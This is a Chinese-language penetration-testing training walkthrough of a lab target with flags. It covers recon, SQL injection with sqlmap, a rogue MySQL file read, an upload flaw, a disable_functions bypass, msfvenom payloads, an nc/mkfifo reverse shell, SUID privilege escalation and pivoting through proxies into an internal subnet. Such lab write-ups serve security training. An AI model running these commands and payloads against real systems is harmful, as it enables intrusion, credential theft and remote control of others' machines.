[原创]linux内网完整渗透测试实例 |

注:此为培训技术文档，过程没有那么详细，因为有培训视频。要想参加培训的访问这个网站 http://edu.moonsec.com

DDD4 靶场介绍

本靶场存在三个 flag 把下载到的虚拟机环境导入到虚拟机，本靶场需要把网络环境配置好。

1.1.网络示意图

信息收集

2.1.主机发现

sudo netdiscover -i eth0 -r 192.168.0.0/24

2.2.nmap 主机发现

nmap -sn 192.168.0.0/24

2.3.masscan 端口探测

sudo masscan -p 1-65535 192.168.0.122 –rate=1000

2.4.nmap 端口信息获取

kali@kali:~/ddd4$ nmap -sC -p 8888,3306,888,21,80 -A 192.168.0.122 -oA ddd4-port Starting Nmap 7.80 ( https://nmap.org ) at 2020-04-27 01:41 EDT

Nmap scan report for 192.168.0.122 Host is up (0.0038s latency).

PORT	STATE SERVICE VERSION	
21/tcp	open  ftp	Pure-FTPd	
|		ssl-cert:	Subject:
commonName=116.27.229.43/organizationName=BT-PANEL/stateOrProvinceName=Gua

ngdong/countryName=CN		
| Not valid before: 2020-04-09T18:40:16		
|_Not valid after:	2030-01-07T18:40:16		
|_ssl-date: TLS randomness does not represent time		
80/tcp	open	http	Apache httpd		
| http-methods:				
|_	Potentially risky methods: TRACE		
|_http-server-header: Apache		
|_http-title:				
\xE6\xB2\xA1\xE6\x9C\x89\xE6\x89\xBE\xE5\x88\xB0\xE7\xAB\x99\xE7\x82\xB9
888/tcp	open	http	Apache httpd		
| http-methods:				
|_	Potentially risky methods: TRACE		
|_http-server-header: Apache		
|_http-title: 403 Forbidden		
3306/tcp open	mysql	MySQL 5.6.47-log		
| mysql-info:				
|	Protocol: 10				
|	Version: 5.6.47-log			
|	Thread ID: 72			
|	Capabilities flags: 63487		
|		Some   Capabilities:   DontAllowDatabaseTableColumn,	Support41Auth,
Speaks41ProtocolOld,	SupportsTransactions,	IgnoreSigpipes,	LongPassword,
 
			暗月内部培训资料
IgnoreSpaceBeforeParenthesis,   InteractiveClient,	Speaks41ProtocolNew,	ODBCClient,
SupportsLoadDataLocal,	ConnectWithDatabase,	SupportsCompression,	FoundRows,
LongColumnFlag,	SupportsMultipleResults,	SupportsMultipleStatments,
SupportsAuthPlugins			
|	Status: Autocommit			
|	Salt: ~4%\!-_vU'`2soS06\NR		
|_	Auth Plugin Name: mysql_native_password		
8888/tcp open  http	Ajenti http control panel		
| http-robots.txt: 1 disallowed entry		
|_/				
|				http-title:
\xE5\xAE\x89\xE5\x85\xA8\xE5\x85\xA5\xE5\x8F\xA3\xE6\xA0\xA1\xE9\xAA\x8C\xE5\xA4\

xB1\xE8\xB4\xA5

|_Requested resource was http://192.168.0.122:8888/login |_http-trane-info: Problem with XML parsing of /evox/about Service Info: Host: 0b842aa5.phpmyadmin

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .

Nmap done: 1 IP address (1 host up) scanned in 17.76 seconds

2.5.绑定 hosts

2.6.gobuser 的高级用法

gobuster dir -u http://www.ddd4.com -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100 -x ‘php,zip,html,rar’ -o ddd4.log –wildcard -l | grep -v 10430 | grep -v “Size: 49”

/contact (Status: 200) [Size: 9142] /products (Status: 200) [Size: 12837] /search (Status: 200) [Size: 7633] /partners (Status: 200) [Size: 8912] /news (Status: 200) [Size: 14705] /jobs (Status: 200) [Size: 14399] /aboutus (Status: 200) [Size: 10027] /News (Status: 200) [Size: 14705] /upload (Status: 403) [Size: 261] /service (Status: 200) [Size: 11713] /skins (Status: 403) [Size: 261] /Products (Status: 200) [Size: 12837] /Contact (Status: 200) [Size: 9142] /vote (Status: 200) [Size: 10708] /aboutUs (Status: 200) [Size: 10027] /AboutUs (Status: 200) [Size: 10027] /temp (Status: 403) [Size: 261] /config (Status: 403) [Size: 261] /404.html (Status: 200) [Size: 1763] /guestbook (Status: 200) [Size: 11408] /NEWS (Status: 200) [Size: 14705] /setup (Status: 403) [Size: 261]
/inc (Status: 403) [Size: 261] /Jobs (Status: 200) [Size: 14399]
/editor (Status: 403) [Size: 261] /Partners (Status: 200) [Size: 8912] /certificate (Status: 200) [Size: 8453] /LICENSE (Status: 403) [Size: 261] /Service (Status: 200) [Size: 11713] /joinus (Status: 200) [Size: 9281] /loader (Status: 301) [Size: 297]
/industrynews (Status: 200) [Size: 11745] /Vote (Status: 200) [Size: 10708] /CONTACT (Status: 200) [Size: 9142] /webmap (Status: 200) [Size: 10834] /JoinUs (Status: 200) [Size: 9281]

对目标进行渗透测试

3.1.SQLMAP 编码注入漏洞利用

sqlmap -u http://www.ddd4.com/search?keyword=11 –tamper chardoubleencode.py -v 1 –batch -p keyword

sqlmap -u http://www.ddd4.com/search?keyword=11 –tamper chardoubleencode.py -v 1 –batch -p keyword -D www_ddd4_com –dump -T doc_user

Table: doc_user								
[1 entry]								
+----	+	---------------	+---------	+---------	+---------	+------------------------------------------				
-----------------------------------				+-----	+---------	+---------	+------	+-----------------		
--------------		+----------	+---------	+---------		+----------	+----------	+----------	+	
--------	-------------	+	+							
|  id	|	ip		|	qq	|	age	|	msn	|pwd
| sex | mtel	| name	| role | email		| dtTime			|
address | cropPic | auditing | nickname | smallPic | username | lastlogin | originalPic |	
+----	+---------------		+---------	+---------	+---------	+------------------------------------------				
-----------------------------------				+-----	+---------	+---------	+------	+-----------------		
--------------	----------	+	+---------	+---------		+----------	+----------	+----------	+----------	
--------	-------------	+	+							
|	1	|	192.168.0.107	|	<blank>|<blank>|<blank>|
33e2q1yc3d033e22aesyc2140aec3l850c3a99s21232f297uj57a5a7438n4a0ex4a801yc3d0	|
1	| <blank> | <blank> | 10    | admin@localhost | 2020-04-24 19:45:38 | webadmin |
<blank> | <blank> | 1	| 创始人	| <blank>	| admin	| 0	|<blank>
|										
+----	+---------------  ---------		+	+---------	+---------	+------------------------------------------				
-----------------------------------				+-----	+---------	+---------	+------	+-----------------	-------	
--------------	----------	+	+---------	+---------		+----------	+----------	+----------	+----------  ---	
--------	-------------	+	+							
webadmin admin							
33e2q1yc3d033e22aesyc2140aec3l850c3a99s21232f297uj57a5a7438n4a0ex4a801yc3d0
明文是加密的解不开的

3.2.MYSQL 服务器恶意读取客户端文件漏洞利用

从网上下来一套源码。发现 setup\setup.php

<?php
$dbhost = $_REQUEST['dbhost']; $uname = $_REQUEST['uname'];
 
暗月内部培训资料

$pwd = $_REQUEST['pwd']; $dbname = $_REQUEST['dbname']; if($_GET['action']=="chkdb"){

$con = @mysql_connect($dbhost,$uname,$pwd); if (!$con){

die('-1');

}

$rs = mysql_query('show databases;'); while($row = mysql_fetch_assoc($rs)){ $data[] = $row['Database'];

}

unset($rs, $row); mysql_close();
if (in_array(strtolower($dbname), $data)){ echo '1';
}else{

echo '0';

}

}elseif($_GET['action']=="creatdb"){ if(!$dbname){

die('0');

}

$con = @mysql_connect($dbhost,$uname,$pwd); if (!$con){

die('-1');

}

if (mysql_query("CREATE DATABASE {$dbname} DEFAULT CHARACTER SET utf8 COLLATE utf8_general_ci",$con)){
echo "1"; }else{
echo mysql_error();

}

mysql_close($con);

}

exit;

?>

$dbhost = $_REQUEST['dbhost'];

$uname	= $_REQUEST['uname'];

$pwd	= $_REQUEST['pwd'];

$dbname	= $_REQUEST['dbname'];

if($_GET['action']=="chkdb"){

$con = @mysql_connect($dbhost,$uname,$pwd); if (!$con){
 
暗月内部培训资料

die('-1');

}

这个可以连接远程的 mysql 所以可以利用 mysql 的 bug 可以读取文件。

3.3.Rogue-MySql-Server 读取文件

https://github.com/allyshka/Rogue-MySql-Server

vim rogue_mysql_server.py

http://www.ddd4.com/setup/checkdb.php?dbname=mysql&uname=root&pwd=123 456&dbhost=192.168.0.109&action=chkdb

获取报错路径

得到数据库连接文件 dbname www_ddd4_com username www_ddd4_com password x4ix6ZrM7b8nFYHn

3.5. 登录 mysql

mysql -h192.168.0.122 -uwww_ddd4_com -px4ix6ZrM7b8nFYHn

3.6. 后台密文登录

密文不能直接破解只能替换登录登录之后再替换回来修改程序生成密文
admin 的明文为 33e2q1yc3d033e22aesyc2140aec3l850c3a99s21232f297uj57a5a7438n4a0ex4a80 1yc3d0

数据库修改密文

原来的密文

33e2q1yc3d033e22aesyc2140aec3l850c3a99s21232f297uj57a5a7438n4a0ex4a801yc3d0

MySQL [www_ddd4_com]> update doc_user set pwd=’33e2q1yc3d033e22aesyc2140aec3l850c3a99s21232f297uj57a5a7438n4a0ex4a801y c3d0′ where id=1;

Query OK, 1 row affected (0.005 sec)

Rows matched: 1 Changed: 1 Warnings: 0

成功登录后台。

3.7.后台上传漏洞

admini\controllers\system\bakup.php

function uploadsql()

{

global $request; $uploadfile=basename($_FILES['uploadfile']['name']); if($_FILES['userfile']['size']>$request['max_file_size'])

echo '<script>alert(" 您 上 传 的 文 件 超 出 了 2M 的 限 制!");window.history.go(-1);</script>';

if(fileext($uploadfile)!='sql')

echo '<script>alert(" 只 允 许 上 传 sql 格 式 文 件!");window.history.go(-1);</script>';

$savepath = ABSPATH.'/temp/data/'.$uploadfile;
 
暗月内部培训资料

if(move_uploaded_file($_FILES['uploadfile']['tmp_name'], $savepath))

{

echo '<script>alert(" 数 据 库 SQL 脚 本 文 件 上 传 成 功!");window.history.go(-1);</script>';

}

else

{

echo '<script>alert(" 数 据 库 SQL 脚 本 文 件 上 传 失 败!");window.history.go(-1);</script>';

}

存在逻辑问题上传 SQL 判断没有退出导致可上传任何文件数据包

上传后无法执行 htc 重写了 url 禁止一些目录访问。

暗月内部培训资料

3.8.模板编辑拿 webshell

4.linux 特权提升

4.1.突破 disable_functions 提权

这套新系统的宝塔系统 php 禁止很多函数的执行 
passthru,exec,system,chroot,chgrp,chown,shell_exec,popen,proc_open,pcntl_exec,ini_alter,i
ni_restore,dl,openlog,syslog,readlink,symlink,popepassthru,pcntl_alarm,pcntl_fork,pcntl_w aitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pc ntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get _last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exe c,pcntl_getpriority,pcntl_setpriority,imap_open,apache_setenv

有些版本还是漏了一些函数可以执行。

http://www.ddd4.com/bypass_disablefunc.php?cmd=ifconfig&outpath=/tmp/xx&sopath =/www/wwwroot/www.ddd4.com/bypass_disablefunc_x64.so

反弹失败。

4.2.metasploit 反弹 shell

4.2.1.生成攻击载荷

sudo msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.0.109 LPORT=13777 -f elf >ddd4

4.2.2.监听端口

msfconsole 打开 metasploit

msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp payload => linux/x86/meterpreter/reverse_tcp

msf5 exploit(multi/handler) > set LHOST 192.168.0.109 LHOST => 192.168.0.109

msf5 exploit(multi/handler) > set lport 13777 lport => 13777

msf5 exploit(multi/handler) > exploit

4.2.3.成功监听 shell

将文件上传到添加执行权限，在目录执行即可 http://www.ddd4.com/bypass_disablefunc.php?cmd=chmod%20777%20ddd4&outpath= /tmp/xx&sopath=/www/wwwroot/www.ddd4.com/bypass_disablefunc_x64.so

http://www.ddd4.com/bypass_disablefunc.php?cmd=./ddd4&outpath=/tmp/xx&sopath= /www/wwwroot/www.ddd4.com/bypass_disablefunc_x64.so

切换 shell

python -c ‘import pty;pty.spawn(“/bin/bash”)’

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.0.109 9001 >/tmp/f

nc -lvnp 9001

python -c ‘import pty;pty.spawn(“/bin/bash”)’

4.4.查看用户

www@host123:/www/wwwroot/www.ddd4.com$ cat /etc/passwd | grep bash cat /etc/passwd | grep bash

root:x:0:0:root:/root:/bin/bash

host123:x:1000:1000:host123,,,:/home/host123:/bin/bash www@host123:/www/wwwroot/www.ddd4.com$

4.5.获取第一个 flag.txt

host123 桌面存在文件 bt.txt www@host123:/www/wwwroot/www.ddd4.com$ cat /home/host123/bt.txt cat /home/host123/bt.txt

Bt-Panel: http://116.27.229.43:8888/944906b5 username: gpeqnjf4
password: d12924fa
www@host123:/www/wwwroot/www.ddd4.com$

4.7.通过 suid 提权到 root

find / -type f -perm -u=s 2>/dev/null
/lib/uncompress.so
/bin/ping
/bin/umount
/bin/su
/bin/ping6
/bin/mount
/bin/fusermount /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/x86_64-linux-gnu/oxide-qt/chrome-sandbox /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/xorg/Xorg.wrap /usr/lib/openssh/ssh-keysign /usr/lib/snapd/snap-confine /usr/lib/eject/dmcrypt-get-device
/usr/sbin/pppd /usr/sbin/sensible-mda /usr/bin/pkexec /usr/bin/gpasswd /usr/bin/passwd /usr/bin/chfn /usr/bin/procmail /usr/bin/newgrp /usr/bin/chsh /usr/bin/sudo
/usr/bin/vmware-user-suid-wrapper /usr/bin/find

存在 find 带有 s 可以用于提权 find test -exec whoami \;

4.8.linux 三大信息收集脚本的使用和解释

4.8.1.LinEnum 的使用

这个脚本是用来收集系统的信息如特殊文件的权限 suid 文件信息网络端口信息建立 WEB 服务器
sudo python -m SimpleHTTPServer 80 下载文件执行 wget http://192.168.0.109/LinEnum.sh

历史记录找到 root 密码 yanisy123

4.8.2.linux-exploit-suggester.的使用

这个用来检测是否存在提权 cve 漏洞

4.8.3.linuxprivchecker.py

这个用来检测权限
python linuxprivchecker.py

4.9.sudo 提权

sudo -l host123 用户可以执行命令

4.10. 第二个 flag

5.linux 内网跨网段渗透

5.1.获取高权限的 meterpreter

先用 metasploit 反弹一个 root 权限的 meterpreter msf5 exploit(multi/handler) > exploit -j
放在后台执行

5.2.网卡路由信息获取

msf5 exploit(multi/handler) > sessions -i 2

[*] Starting interaction with 2...

meterpreter > ifconfig

Interface	1

============

Name	: lo

Hardware MAC : 00:00:00:00:00:00

MTU	: 65536

Flags	: UP,LOOPBACK

IPv4 Address : 127.0.0.1

IPv4 Netmask : 255.0.0.0

IPv6 Address : ::1

IPv6 Netmask : ffff:ffff:ffff:ffff:ffff:ffff::



Interface	2

============

Name	: ens33

Hardware MAC : 00:0c:29:c7:f2:4f

MTU	: 1500

Flags	: UP,BROADCAST,MULTICAST

IPv4 Address : 192.168.0.122
 
暗月内部培训资料

IPv4 Netmask : 255.255.255.0

IPv6 Address : fe80::973d:c7c9:d30d:8cb8

IPv6 Netmask : ffff:ffff:ffff:ffff::



Interface	3

============

Name	: ens38

Hardware MAC : 00:0c:29:c7:f2:59

MTU	: 1500

Flags	: UP,BROADCAST,MULTICAST

IPv4 Address : 10.10.10.145

IPv4 Netmask : 255.255.255.0

IPv6 Address : fe80::3b3c:b923:c6aa:54c3

IPv6 Netmask : ffff:ffff:ffff:ffff::

meterpreter > run get_local_subnets

[!]	Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.

[!]	Example: run post/multi/manage/autoroute OPTION=value [...]

Local subnet: 10.10.10.0/255.255.255.0

Local subnet: 192.168.0.0/255.255.255.0

5.3.查看 host 文件

cat /etc/hosts

5.4.metasploit 设置代理进入内网

meterpreter > run autoroute -s 10.10.10.0/24

[!]	Meterpreter scripts are deprecated. Try post/multi/manage/autoroute.

[!]	Example: run post/multi/manage/autoroute OPTION=value [...]

[*] Adding a route to 10.10.10.0/255.255.255.0...

[+] Added route to 10.10.10.0/255.255.255.0 via 192.168.0.122 [*] Use the -p option to list all active routes

5.4.1.启动 sock4 模块

sf5 exploit(multi/handler) > search sock4 [-] No results from search
msf5 exploit(multi/handler) > use auxiliary/server/socks4a
msf5 auxiliary(server/socks4a) >
msf5 auxiliary(server/socks4a) > show options
Module options (auxiliary/server/socks4a):

Name	Current Setting	Required	Description

----	---------------  --------  -----------

SRVHOST	0.0.0.0	yes	The address to listen on
SRVPORT	1080	yes	The port to listen on.
Auxiliary action:		
Name	Description		
----	-----------		
Proxy				


msf5 auxiliary(server/socks4a) > set SRVPORT 22333 SRVPORT => 22333

msf5 auxiliary(server/socks4a) > exploit

[*]	Auxiliary module running as background job 1.

[*]	Starting the socks4a proxy server

5.4.2.设置 proxychains3 代理进内网

proxychains3 nmap -sT -Pn 10.10.10.144

发现是 emlog 后台默认密码 123456 即可登录但是用 proxychains3 不是很稳定。

5.5.1.设置浏览器代理访问

5.5.2.后台拿 WEBSHELL

从网上下来一个 emlog 把带有后门文件的 php 设置打包好在 emlog 后台上传模板压缩包解压后即可在模板名的目录生成一个 php 后门。

5.5.3.metasploit 生成正向连接

sudo msfvenom -p linux/x86/meterpreter/bind_tcp LPORT=13777 -f elf >ddd5

上传到 host123 主机上。

http://www.ddd5.com/content/templates/moonsec/shell.php?cmd=wget%20http://10.10. 10.145/ddd5%20-o%20ddd5
chmod 777 ddd5 执行 http://www.ddd5.com/content/templates/moonsec/shell.php?cmd=./ddd5

5.5.4.连接远程 SHELL

msf5 auxiliary(server/socks4a) > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/bind_tcp payload => linux/x86/meterpreter/bind_tcp
msf5 exploit(multi/handler) > set RHOST 10.10.10.144 RHOST => 10.10.10.144
exploit
正常的情况下是会连接上的但是可能 centos 的关系有些代码错误导致连接不上。

5.6.sock5 隧道代理穿透内网

使用 metasploit sock4a 代理在实际环境中不怎么稳定如有不稳定最好使用 rssock 代理穿透内网。
下载地址 https://nchc.dl.sourceforge.net/project/ssocks/ssocks-0.0.14.tar.gz
在kali host123 都需要进行编译生成文件下载完进行解压 -tar -zxvf ssocks-0.0.14.tar.gz cd ssocks-0.0.14
./configuire && make
在kali 执行
./rcsocks -l 2233 -p 1080 -vv